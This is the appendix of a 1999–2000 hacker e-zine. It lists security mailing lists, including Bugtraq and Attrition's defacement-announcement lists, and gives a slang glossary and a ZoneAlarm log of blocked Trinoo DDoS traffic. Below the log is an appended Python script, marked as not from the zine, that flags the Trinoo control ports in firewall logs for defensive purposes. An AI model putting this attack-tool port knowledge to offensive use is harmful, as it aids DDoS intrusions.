           / ___| _   _| |__  _ __ ___ (_)___ ___(_) ___  _ __  ___
           \___ \| | | | '_ \| '_ ` _ \| / __/ __| |/ _ \| '_ \/ __|
            ___) | |_| | |_) | | | | | | \__ \__ \ | (_) | | | \__ \
           |____/ \__,_|_.__/|_| |_| |_|_|___/___/_|\___/|_| |_|___/


    All submissions that are `published' are printed with the credits
    you provide; if no response is received within a week or two it is assumed
    that you don't care whether the article/email is to be used in an issue
    or not, and it may be used at my discretion.

    Looking for:

    Good news sites that are not already listed here OR on the HNN affiliates
    page at http://www.hackernews.com/affiliates.html

    Magazines (complete or just the articles) of breaking sekurity or hacker
    activity in your region, this includes telephone phraud and any other
    technological use, abuse hole or cool thingy. ;-) cut em out and send it
    to the drop box.


    - Ed
    
    
    

A.8 Mailing list Info
    ~~~~~~~~~~~~~~~~~



    Mailing List Subscription Info   (Far from complete)         Feb 1999
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~   ~~~~~~~~~~~~~~~~~~~         ~~~~~~~~

    ISS Security mailing list faq : http://www.iss.net/iss/maillist.html
    
    
    ATTRITION.ORG's Website defacement mirror and announcement lists
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    http://www.attrition.org/mirror/attrition/    
    http://www.attrition.org/security/lists.html
    
    --
      
      defaced [web page defacement announce list]
      
      This is a public LOW VOLUME (1) mail list to circulate news/info on 
      defaced web sites. To subscribe to Defaced, send mail to 
      majordomo@attrition.org with "subscribe defaced" in the BODY of 
      the mail.
      
      There will be two types of posts to this list:
      
              1. brief announcements as we learn of a web defacement.
                 this will include the site, date, and who signed the 
                 hack. we will also include a URL of a mirror of the hack.
      
              2. at the end of the day, a summary will be posted
                 of all the hacks of the day. these can be found
                 on the mirror site listed under 'relevant links'
      
      This list is for informational purposes only. Subscribing
      denotes your acceptance of the following:
      
              1. we have nothing to do with the hacks. at all.
      
              2. we are only mirroring the work of OTHER people.
      
              3. we can not be held liable for anything related to these
                 hacks.
      
              4. all of the points on the disclaimer listed below.
      
      Under no circumstances may the information on this list be used
      to solicit security business. You do not have permission to forward
      this mail to anyone related to the domain that was defaced.
      
      enjoy.
      
      List maintainer: mcintyre@attrition.org
      Hosted by: majordomo@attrition.org
      
      Relevant Links: 
              Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
              ATTRITION Mirror: http://www.attrition.org/mirror/
      
      (1) It is low volume on a normal day. On days of many defacements,
          traffic may be increased. On a few days, it is a virtual mail
          flood. You have been warned. ;)
      
    -=-
    
    --
      
      defaced summary [web page defacement announce list]
      
      This is a low traffic mail list to announce all publicly
      defaced domains on a given day. To subscribe to Defaced-Summary, send mail to 
      majordomo@attrition.org with "subscribe defaced-summary" in the BODY of 
      the mail.
      
      There will be ONE type of post to this list:
      
              1. a single nightly piece of mail listing all reported
                 domains. the same information can be found on
                 http://www.attrition.org/mirror/attrition/
                 via sporadic updates.
      
      This list is for informational purposes only. Subscribing
      denotes your acceptance of the following:
      
              1. we have nothing to do with the hacks. at all.
      
              2. we are only mirroring the work of OTHER people.
      
              3. we can not be held liable for anything related to these
                 hacks.
      
              4. all of the points on the disclaimer listed below.
      
      Under no circumstances may the information on this list be used
      to solicit security business. You do not have permission to forward
      this mail to anyone related to the domain that was defaced.
      
      enjoy.
      
      List maintainer: jericho@attrition.org
      Hosted by: majordomo@attrition.org
      
      Relevant Links: 
              Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
              ATTRITION Mirror: http://www.attrition.org/mirror/
              
              
     -=-
     
      defaced GM [web page defacement announce list]
      
      This is a low traffic mail list to announce all publicly
      defaced government and military domains on a given day. To subscribe to 
      Defaced-GM, send mail to majordomo@attrition.org with "subscribe defaced-gm" 
      in the BODY of the mail.
      
      There will be ONE type of post to this list:
      
              1. sporadic pieces of mail for each government (.gov)
                 or military (.mil) system defaced. the same information 
                 can be found on http://www.attrition.org/mirror/attrition/
                 via sporadic updates.
      
      This list is designed primarily for government and military
      personnel charged with tracking security incidents on
      government run networks.
      
      This list is for informational purposes only. Subscribing
      denotes your acceptance of the following:
      
              1. we have nothing to do with the hacks. at all.
      
              2. we are only mirroring the work of OTHER people.
      
              3. we can not be held liable for anything related to these
                 hacks.
      
              4. all of the points on the disclaimer listed below.
      
      Under no circumstances may the information on this list be used
      to solicit security business. You do not have permission to forward
      this mail to anyone related to the domain that was defaced.
      
      enjoy.
      
      List maintainer: jericho@attrition.org
      Hosted by: majordomo@attrition.org
      
      Relevant Links: 
              Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
              ATTRITION Mirror: http://www.attrition.org/mirror/
              
     
      --
      
      defaced alpha [web page defacement announce list]
      
      This is a low traffic mail list to announce via alpha-numeric
      pagers, all publicly defaced government and military domains 
      on a given day. To subscribe to Defaced-Alpha, send mail to 
      majordomo@attrition.org with "subscribe defaced-alpha" in 
      the BODY of the mail.
      
      There will be ONE type of post to this list:
      
              1. sporadic pieces of mail for each government (.gov)
                 or military (.mil) system defaced. the information
                 will only include domain names. the same information 
                 can be found on http://www.attrition.org/mirror/attrition/
                 via sporadic updates.
      
      This list is designed primarily for government and military
      personnel charged with tracking security incidents on
      government run networks. Further, it is designed for 
      quick response and aimed at law enforcement agencies like
      DCIS and the FBI.
      
      To subscribe to this list, a special mail will be sent to YOUR
      alpha-numeric pager. A specific response must be made within
      12 hours of receiving the mail to be subscribed. If the response
      is not received, it is assumed the mail was not sent to your 
      pager.
      
      This list is for informational purposes only. Subscribing
      denotes your acceptance of the following:
      
              1. we have nothing to do with the hacks. at all.
      
              2. we are only mirroring the work of OTHER people.
      
              3. we can not be held liable for anything related to these
                 hacks.
      
              4. all of the points on the disclaimer listed below.
      
      Under no circumstances may the information on this list be used
      to solicit security business. You do not have permission to forward
      this mail to anyone related to the domain that was defaced.
      
      enjoy.
      
      List maintainer: jericho@attrition.org
      Hosted by: majordomo@attrition.org
      
      Relevant Links: 
              Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
              ATTRITION Mirror: http://www.attrition.org/mirror/
      
         
      
    -=-     
      

    


    THE MOST READ:

    BUGTRAQ - Subscription info
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~

    What is Bugtraq?

    Bugtraq is a full-disclosure UNIX security mailing list, (see the info
    file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
    bugtraq, send mail to listserv@netspace.org containing the message body
    subscribe bugtraq. I've been archiving this list on the web since late
    1993. It is searchable with glimpse and archived on-the-fly with hypermail.

    Searchable Hypermail Index;

          http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html

          

    About the Bugtraq mailing list
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    The following comes from Bugtraq's info file:

    This list is for *detailed* discussion of UNIX security holes: what they are,
    how to exploit, and what to do to fix them.

    This list is not intended to be about cracking systems or exploiting their
    vulnerabilities. It is about defining, recognizing, and preventing use of
    security holes and risks.

    Please refrain from posting one-line messages or messages that do not contain
    any substance that can relate to this list's charter.

    I will allow certain informational posts regarding updates to security tools,
    documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
    on this list.

    Please follow the below guidelines on what kind of information should be posted
    to the Bugtraq list:

    + Information on Unix related security holes/backdoors (past and present)
    + Exploit programs, scripts or detailed processes about the above
    + Patches, workarounds, fixes
    + Announcements, advisories or warnings
    + Ideas, future plans or current works dealing with Unix security
    + Information material regarding vendor contacts and procedures
    + Individual experiences in dealing with above vendors or security 
      organizations
    + Incident advisories or informational reporting

    Any non-essential replies should not be directed to the list but to the
    originator of the message. Please do not "CC" the bugtraq reflector 
    address if the response does not meet the above criteria.

    Remember: YOYOW.

    You own your own words. This means that you are responsible for the words
    that you post on this list and that reproduction of those words without 
    your permission in any medium outside the distribution of this list may be
    challenged by you, the author.

    For questions or comments, please mail me:
    chasin@crimelab.com (Scott Chasin)
    
    
    UPDATED Sept/99 - Sent in by Androthi, tnx for the update
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    

      I am pleased to inform you of several changes that will be occurring
      on June 5th. I hope you find them as exciting as I do.
      
      
      BUGTRAQ moves to a new home
      ---------------------------
      
      
      First, BUGTRAQ will be moving from its current home at NETSPACE.ORG
      to SECURITYFOCUS.COM. What is Security Focus you ask? Wait and read
      below. Other than the change of domains nothing of how the list
      is run changes. I am still the moderator. We play by the same rules.
      
      
      Security Focus will be providing mail archives for BUGTRAQ. The
      archives go back longer than Netspace's and are more complete than
      Geek-Girl's.
      
      
      The move will occur one week from today. You will not need to
      resubscribe. All your information, including subscription options
      will be moved transparently.
      
      
      Any of you using mail filters (e.g. procmail) to sort incoming
      mail into mail folders by examining the From address will have to
      update them to include the new address. The new address will be:
      
      
                            BUGTRAQ@SECURITYFOCUS.COM
      
      
      Security Focus will also be providing a free searchable vulnerability
      database.
      
      
      BUGTRAQ es muy bueno
      --------------------
      
      
      It has also become apparent that there is a need for forums
      in the spirit of BUGTRAQ where non-English speaking people
      or people that don't feel comfortable speaking English can
      exchange information.
      
      
      As such I've decided to give BUGTRAQ in other languages a try.
      BUGTRAQ will continue to be the place to submit vulnerability
      information, but if you feel more comfortable using some other
      language you can give the other lists a try. All relevant information
      from the other lists which have not already been covered here
      will be translated and forwarded on by the list moderator.
      
      
      In the next couple of weeks we will be introducing BUGTRAQ-JP
      (Japanese) which will be moderated by Nobuo Miwa <n-miwa@lac.co.jp>
      and BUGTRAQ-SP (Spanish) which will be moderated by CORE SDI S.A.
      from Argentina <http://www.core-sdi.com/> (the folks that brought you
      Secure Syslog and the SSH insertion attack).
      
      
      What is Security Focus?
      -----------------------
      
      
      Security Focus is an exercise in creating a community and a security
      resource. We hope to be able to provide a medium where useful and
      successful resources such as BUGTRAQ can occur, while at the same
      time providing a comprehensive source of security information. Aside
      from moving just BUGTRAQ over, the Geek-Girl archives (and the Geek Girl
      herself!) have moved over to Security Focus to help us with building
      this new community. The other staff at Security Focus are largely derived
      from long time supporters of Bugtraq and the community in general. If
      you are interested in viewing the staff pages, please see the 'About'
      section on www.securityfocus.com.
      
      
      On the community creating front you will find a set of forums
      and mailing lists we hope you will find useful. A number of them
      are not scheduled to start for several weeks but starting today
      the following list is available:
      
      
      * Incidents' Mailing List. BUGTRAQ has always been about the
         discussion of new vulnerabilities. As such I normally don't approve
         messages about break-ins, trojans, viruses, etc with the exception
         of wide spread cases (Melissa, ADM worm, etc). The other choice
         people are usually left with is email CERT but this fails to
         communicate this important information to others that may be
         potentially affected.
      
      
         The Incidents mailing list is a lightly moderated mailing list to
         facilitate the quick exchange of security incident information.
         Topical items include such things as information about rootkits
         new trojan horses and viruses, source of attacks and tell-tale
         signs of intrusions.
      
      
         To subscribe email LISTSERV@SECURITYFOCUS.COM with a message body
         of:
      
      
                   SUBS INCIDENTS FirstName, LastName
      
      
      Shortly we'll also be introducing an Information Warfare forum along
      with ten other forums over the next two months. These forums will be
      built and moderated by people in the community as well as vendors who
      are willing to take part in the community building process.
      *Note to the vendors here* We have several security vendors who have
      agreed to run forums where they can participate in the online communities.
      If you would like to take part as well, mail Alfred Huger,
      ahuger@securityfocus.com.
      
      
      On the information resource front you will find a large database of
      the following:
      
      
      * Vulnerabilities. We are making accessible a free vulnerability
         database. You can search it by vendor, product and keyword. You
         will find detailed information on the vulnerability and how to fix it,
         as well as links to reference information such as email messages,
         advisories and web pages. You can search by vendor, product and
         keywords. The database itself is the result of culling through 5
         years of BUGTRAQ plus countless other lists and news groups. It's
         a shining example of how thorough full disclosure has made a significant
         impact on the industry over the last half decade.
      
      
      * Products. An incredible number of categorized security products
         from over two hundred different vendors.
      
      
      * Services. A large and focused directory of security services offered by
         vendors.
      
      
      * Books, Papers and Articles. A vast number of categorized security
         related books, papers and articles. Available to download directly
         from our servers when possible.
      
      
      * Tools. A large array of free security tools. Categorized and
         available for download.
      
      
      * News: A vast number of security news articles going all the way
         back to 1995.
      
      
      * Security Resources: A directory to other security resources on
         the net.
      
      
      As well as many other things such as an event calendar.
      
      
      For your convenience the home-page can be personalized to display
      only information you may be interested in. You can filter by
      categories, keywords and operating systems, as well as configure
      how much data to display.
      
      
      I'd like to thank the fine folks at NETSPACE for hosting the
      site for as long as they have. Their services have been invaluable.
      
      
      I hope you find these changes for the best and the new services
      useful. I invite you to visit http://www.securityfocus.com/ and
      check it out for yourself. If you have any comments or suggestions
      please feel free to contact me at this address or at
      aleph1@securityfocus.com.
      
      
      Cheers.
      
      
      --
      Aleph One / aleph1@underground.org
      http://underground.org/
      KeyID 1024/948FD6B5
      Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01
      



    
    Crypto-Gram
    ~~~~~~~~~~~

      CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
      insights, and commentaries on cryptography and computer security.

      To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
      blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
      visit http://www.counterpane.com/unsubform.html. Back issues are available
      on http://www.counterpane.com.

      CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
      Counterpane Systems, the author of "Applied Cryptography," and an inventor
      of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of
      the International Association for Cryptologic Research, EPIC, and VTW. He
      is a frequent writer and lecturer on cryptography.


    CUD Computer Underground Digest
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    This info directly from their latest ish:

    Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09

                          ISSN  1004-042X

       Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
       News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
       Archivist: Brendan Kehoe
       Poof Reader:   Etaion Shrdlu, Jr.
       Shadow-Archivists: Dan Carosone / Paul Southworth
                          Ralph Sims / Jyrki Kuoppala
                          Ian Dickinson
       Cu Digest Homepage: http://www.soci.niu.edu/~cudigest



    [ISN] Security list
    ~~~~~~~~~~~~~~~~~~~
    This is a low volume list with lots of informative articles; if I had my
    way I'd reproduce them ALL here, well almost all .... ;-) - Ed

    
    UPDATED Sept/99 - Sent in by Androthi, tnx for the update
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
      
      --[ New ISN announcement (New!!)
      
      
      Sender:       ISN Mailing List <ISN@SECURITYFOCUS.COM>
      From:         mea culpa <jericho@DIMENSIONAL.COM>
      Subject:      Where has ISN been?
      Comments: To: InfoSec News <isn@securityfocus.com>
      To:           ISN@SECURITYFOCUS.COM
      
      
      It all starts long ago, on a network far away..
      
      
      Not really. Several months ago the system that hosted the ISN mail list
      was taken offline. Before that occurred, I was not able to retrieve the
      subscriber list. Because of that, the list has been down for a while. I
      opted to wait to get the list back rather than attempt to make everyone
      resubscribe.
      
      
      As you can see from the headers, ISN is now generously being hosted by
      Security Focus [www.securityfocus.com]. They are providing the bandwidth,
      machine, and listserv that runs the list now.
      
      
      Hopefully, this message will find all ISN subscribers, help us weed out
      dead addresses, and assure you the list is still here. If you have found
      the list to be valuable in the past, please tell friends and associates
      about the list. To subscribe, mail listserv@securityfocus.com with
      "subscribe isn firstname lastname". To unsubscribe, "unsubscribe isn".
      
      
      As usual, comments and suggestions are welcome. I apologize for the down
      time of the list. Hopefully it won't happen again. ;)
      
      
      
      mea_culpa
      www.attrition.org
      
      
      
      --[ Old ISN welcome message
      
      
      [Last updated on: Mon Nov  04  0:11:23 1998]
      
      
      InfoSec News is a privately run, medium traffic list that caters 
      to distribution of information security news articles. These 
      articles will come from newspapers, magazines, online resources, 
      and more.
      
      
      The subject line will always contain the title of the article, so that
      you may quickly and efficiently filter past the articles of no interest.
      
      
      This list will contain:
      
      
      o       Articles catering to security, hacking, firewalls, new security
              encryption, products, public hacks, hoaxes, legislation affecting
              these topics and more.
      
      
      o       Information on where to obtain articles in current magazines.
      
      
      o       Security Book reviews and information.
      
      
      o       Security conference/seminar information.
      
      
      o       New security product information.
      
      
      o       And anything else that comes to mind..
      
      
      Feedback is encouraged. The list maintainers would like to hear what
      you think of the list, what could use improving, and which parts
      are "right on". Subscribers are also encouraged to submit articles
      or URLs. If you submit an article, please send either the URL or
      the article in ASCII text. Further, subscribers are encouraged to give
      feedback on articles or stories, which may be posted to the list.
      
      
      Please do NOT:
      
      
              * subscribe vanity mail forwards to this list
      
      
              * subscribe from 'free' mail addresses (ie: juno, hotmail)
      
      
              * enable vacation messages while subscribed to mail lists
      
      
              * subscribe from any account with a small quota
      
      
      All of these generate messages to the list owner and make tracking
      down dead accounts very difficult. I am currently receiving as many 
      as fifty returned mails a day. Any of the above are grounds for
      being unsubscribed. You are welcome to resubscribe when you address
      the issue(s).
      
      
      Special thanks to the following for continued contribution:
              William Knowles, Aleph One, Will Spencer, Jay Dyson,
              Nicholas Brawn, Felix von Leitner, Phreak Moi and 
              other contributors.
      
      
      ISN Archive: ftp://ftp.repsec.com/pub/text/digests/isn
      ISN Archive: http://www.landfield.com/isn
      ISN Archive: http://www.jammed.com/Lists/ISN/
      
      
      ISN is Moderated by 'mea_culpa' <jericho@dimensional.com>. ISN is a
          private list. Moderation of topics, member subscription, and
          everything else about the list is solely at his discretion.
      
      
      The ISN membership list is NOT available for sale or disclosure.  
      
      
      ISN is a non-profit list. Sponsors are only donating to cover bandwidth 
          and server costs. 
          
          
     Win2k Security Advice Mailing List (new added Nov 30th 1999)
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     
      To subscribe:
      
      
      send "SUBSCRIBE WIN2KSECADVICE anonymous or name" in the message body
      to  listserv@listserv.ntsecurity.net
      
     
      
      Welcome to Win2K Security Advice! Thank you for subscribing. If you have any
      questions or comments about the list please feel free to contact the list
      moderator, Steve Manzuik, at steve@win2ksecadvice.net.
      
      To see what you've missed recently on the list, or to research an item
      of interest, be sure to visit the Web-based archives located at:
      http://www.ntsecurity.net/scripts/page_listserv.asp?s=win2ksec
      
      ==============
      NTSecurity.net brings the security community a brand new (Oct 99) and
      much-requested Windows security mailing list. This new moderated mailing list,
      Win2KSecAdvice (formerly NTSecAdvice) is geared towards promoting the open
      discussion of Windows-related security issues.
      
      With a firm and unwavering commitment towards timely full disclosure, this
      new resource promises to become a great forum for open discussion
      regarding security-related bugs, vulnerabilities, potential exploits, viruses,
      worms, Trojans, and more. Win2KSecAdvice promotes a strong sense of community
      and we openly invite all security minded individuals, be they white hat,
      gray hat, or black hat, to join the new mailing list.
      
      While Win2KSecAdvice was named in the spirit of Microsoft's impending product
      line name change, and meant to reflect the list's security focus both now and
      in the long run, it is by no means limited to security topics centered around
      Windows 2000. Any security issues that pertain to Windows-based networking are
      relevant for discussion, including all Windows operating systems, MS Office,
      MS BackOffice, and all related third party applications and hardware.
      
      The scope of Win2KSecAdvice can be summarized very simply: if it's relevant to
      a security risk, it's relevant to the list.
      
      The list archives are available on the Web at http://www.ntsecurity.net,
      which include a List Charter and FAQ, as well as Web-based searchable list
      archives for your research endeavors.
      
      SAVE THIS INFO FOR YOUR REFERENCE:
      
      To post to the list simply send your email to
      win2ksecadvice@listserv.ntsecurity.net
      
      To unsubscribe from this list, send UNSUBSCRIBE WIN2KSECADVICE to
      listserv@listserv.ntsecurity.net
      
      Regards,
      
      Steve Manzuik, List Moderator
      Win2K Security Advice
      steve@win2ksecadvice.net     

    @HWA
    

A.9  What's in a name? Why HWA.hax0r.news??
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                             
      
      Well, what does HWA stand for? Never mind; if you ever find out I may
      have to get those hax0rs from 'Hackers' or the Pretorians after you.

     In case you couldn't figure it out, hax0r is "new skewl" and although
     it is laughed at, shunned, or even pigeonholed with those 'dumb
     leet (l33t?) dewds' <see article in issue #4> this is the state
     of affairs. It ain't Steven Levy's HACKERS anymore. BTW, to all you
     up and comers, I'd highly recommend you get that book. It's almost
     like buying a clue. Anyway.. on with the show .. - Editorial staff


     @HWA

A.10 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
                    _   ___        ___      _____ _    ___
                   | | | \ \      / / \    |  ___/ \  / _ \
                   | |_| |\ \ /\ / / _ \   | |_ / _ \| | | |
                   |  _  | \ V  V / ___ \ _|  _/ ___ \ |_| |
                   |_| |_|  \_/\_/_/   \_(_)_|/_/   \_\__\_\
                     

    Also released in issue #3. (revised) check that issue for the faq
    it won't be reprinted unless changed in a big way with the exception
    of the following excerpt from the FAQ, included to assist first time
    readers:

    Some of the terms related to personal usage and use in this zine are
    listed below: some are very useful, others attempt to deny any possible
    attempts at eschewing obfuscation by obscuring their actual definitions.

    @HWA   - see EoA  ;-)

    !=     - Mathematical notation "is not equal to" or "does not equal"
             ASC(247)  "wavy equals" sign means "almost equal" to. If written
             an =/= (equals sign with a slash thru it) also means !=, =< is Equal
             to or less than and =>  is equal to or greater than (etc, this aint
             fucking grade school, cripes, don't believe I just typed all that..)

    AAM    - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)

    AOL    - A great deal of people that got ripped off for net access by a huge
             clueless isp with sekurity that you can drive buses through, we're
             not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
             least they could try leasing one??

   *CC     - 1 - Credit Card (as in phraud)
             2 - .cc is COCOS (Keeling) ISLANDS but they probably accept cc's

    CCC    - Chaos Computer Club (Germany)

   *CON    - Conference, a place hackers crackers and hax0rs among others go to swap
             ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
             watch videos and seminars, get drunk, listen to speakers, and last but
             not least, get drunk.
   *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
                 speak he's the guy that breaks into systems and is often (but by no
                 means always) a "script kiddie" see pheer
              2 . An edible biscuit usually crappy tasting without a nice dip, I like
                  jalapeno pepper dip or chives sour cream and onion, yum - Ed

    Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
              Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
              ebonics, speaking in a dark tongue ... being ereet, see pheer

    EoC    - End of Commentary

    EoA    - End of Article or more commonly @HWA

    EoF    - End of file

    EoD    - End of diatribe (AOL'ers: look it up)

    FUD    - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
            usually in general media articles not high brow articles such as ours or other
            HNN affiliates ;)

    du0d   - a small furry animal that scurries over keyboards causing people to type
             weird crap on irc, hence when someone says something stupid or off topic
             'du0d wtf are you talkin about' may be used.

   *HACKER - Read Steven Levy's HACKERS for the true definition, then see HAX0R

   *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
            define, I think it is best defined as pop culture's view on The Hacker ala
            movies such as well erhm "Hackers" and The Net etc... usually used by "real"
            hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
            some coffee?' or can you hax0r some bread on the way to the table please?'

            2 - A tool for cutting sheet metal.

    HHN    - Maybe a bit confusing with HNN but we did spring to life around the same
             time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
             noun means the hackernews site proper. k? k. ;&

    HNN    - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html

    J00    - "you"(as in j00 are OWN3D du0d) - see 0wn3d

    MFI/MOI- Missing on/from IRC

    NFC   - Depends on context: No Further Comment or No Fucking Comment

    NFR   - Network Flight Recorder (Do a websearch) see 0wn3d

    NFW   - No fuckin'way

   *0WN3D - You are cracked and owned by an elite entity see pheer
   *OFCS  - Oh for christ's sakes

    PHACV - And variations of same <coff>
            Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, 
            Warfare

          Alternates: H - hacking, hacktivist
                      C - Cracking <software>
                      C - Cracking <systems hacking>
                      V - Virus
                      W - Warfare <cyberwarfare usually as in Jihad>
                      A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
                      P - Phreaking, "telephone hacking" PHone fREAKs ...
                     CT - Cyber Terrorism

   *PHEER -  This is what you do when an ereet or elite person is in your presence
            see 0wn3d

   *RTFM  - Read the fucking manual - not always applicable since some manuals are
            pure shit but if the answer you seek is indeed in the manual then you
            should have RTFM you dumb ass.

    TBC   - To Be Continued also 2bc (usually followed by ellipses...) :^0

    TBA   - To Be Arranged/To Be Announced also 2ba

    TFS   - Tough fucking shit.

   *w00t  - 1 - Reserved for the uber ereet, no one can say this without severe repercussions
            from the underground masses. also "w00ten" <sic>

            2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)

    *wtf  - what the fuck, where the fuck, when the fuck etc ..

    *ZEN  - The state you reach when you *think* you know everything (but really don't)
            usually shortly after reaching the ZEN like state something will break that
            you just 'fixed' or tweaked.
            
            
A.11  NEW Underground E-Zines
      ~~~~~~~~~~~~~~~~~~~~~~~
      
      New releases:
      
      SET Saqueadores Edición Técnica: http://www.set-ezine.org
      f41th magazine issue 12 is out.: http://f41th.com/index2.html
      Digital Defiance 5 (!) is out..: http://www.hackers.cx
      
      
      New zines on the scene:       

      InET.......................... http://www.warpedreality.com/inet
      Hack In the Box............... http://www.thelimit.net/hitb      
      Quadcon....................... http://landfill.bit-net.com/~quadcon/quadcon-3.txt      
      DataZine...................... http://www.tdcore.com
      Napalm........................ http://napalm.firest0rm.org/
      Digital Defiance.............. http://www.hackers.cx  
      
      
            
   @HWA            
   
   2000-03-19 22:11:38, 2001524, Trinoo master activity, 24.x.x.x, 
   CR900935-A, x.x.x.x, data=png_l44adsl, 1

      Name Packet sent from x.x.x.x (UDP Port 31335) to x.x.x.x (UDP Port 27444) was blocked 
      Status Dropped 
      Source IP Address x.x.x.x
      Destination IP Address x.x.x.x
      Source Port 31335 
      Destination Port 27444 
      Link Layer Protocol 1 
      Network Layer Protocol 1 
      Transport Layer Protocol 1 
      Count 1 
      Status Code 100002 
      Lock Level 0 
      Security Information 0,1,0,2 
      Operating System Windows NT-5.0.2195--SP 
      Product ZoneAlarm 
      
      
   phear the weekend kiddy scans ...      
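   As an added example (not from the zine), a small Python checker over ZoneAlarm
   packet lines like the one above, flagging the well-known Trinoo control ports
   so a weekend scan like this stands out in a log; the port roles follow the
   published 1999 analysis of trinoo, and all sample lines after the first are
   constructed.

```python
import re

# Well-known Trinoo DDoS control ports (from the public 1999 analysis of trinoo).
TRINOO_PORTS = {
    27444: "UDP: master -> daemon command channel",
    31335: "UDP: daemon -> master reply channel",
    27665: "TCP: attacker -> master control port",
}

# Matches the ZoneAlarm "Name Packet sent from ... was blocked" record format.
PACKET_RE = re.compile(
    r"Packet sent from (?P<src>\S+) \((?P<proto>\w+) Port (?P<sport>\d+)\) "
    r"to (?P<dst>\S+) \((?P=proto) Port (?P<dport>\d+)\) was (?P<action>\w+)"
)

def classify_packet(line):
    """Parse one ZoneAlarm packet line.

    Returns None for lines that are not packet records (e.g. 'Status Dropped');
    otherwise a dict of the parsed fields plus the Trinoo port roles hit."""
    m = PACKET_RE.search(line)
    if not m:
        return None
    sport, dport = int(m["sport"]), int(m["dport"])
    return {
        "src": m["src"], "dst": m["dst"], "proto": m["proto"],
        "sport": sport, "dport": dport, "action": m["action"].lower(),
        "trinoo": [TRINOO_PORTS[p] for p in (sport, dport) if p in TRINOO_PORTS],
    }

def scan_log(text):
    """Return only the packet records that touch a Trinoo control port."""
    return [r for r in map(classify_packet, text.splitlines()) if r and r["trinoo"]]

# Constructed sample: the zine's own record, a harmless blocked HTTP packet,
# and a TCP probe at the master control port.
SAMPLE_LOG = """\
Name Packet sent from x.x.x.x (UDP Port 31335) to x.x.x.x (UDP Port 27444) was blocked
Status Dropped
Name Packet sent from 10.0.0.5 (TCP Port 1067) to 10.0.0.1 (TCP Port 80) was blocked
Name Packet sent from 10.0.0.9 (TCP Port 2048) to 10.0.0.1 (TCP Port 27665) was blocked
"""

if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG):
        print(f"{a['proto']} {a['src']}:{a['sport']} -> {a['dst']}:{a['dport']} "
              f"({a['action']}): {'; '.join(a['trinoo'])}")
```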
   
   

  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
    --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--

    © 1998, 1999 (c) Cruciphux/HWA.hax0r.news <tm> (R) { w00t }
    
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-                       
     --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
   [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
       [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]